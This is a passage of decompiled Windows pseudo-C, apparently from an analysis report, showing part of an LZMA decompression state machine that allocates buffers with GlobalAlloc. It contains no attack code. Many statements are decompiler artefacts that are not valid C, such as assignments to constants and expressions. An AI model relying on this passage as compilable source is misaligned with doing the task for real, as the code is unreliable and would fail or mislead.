													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
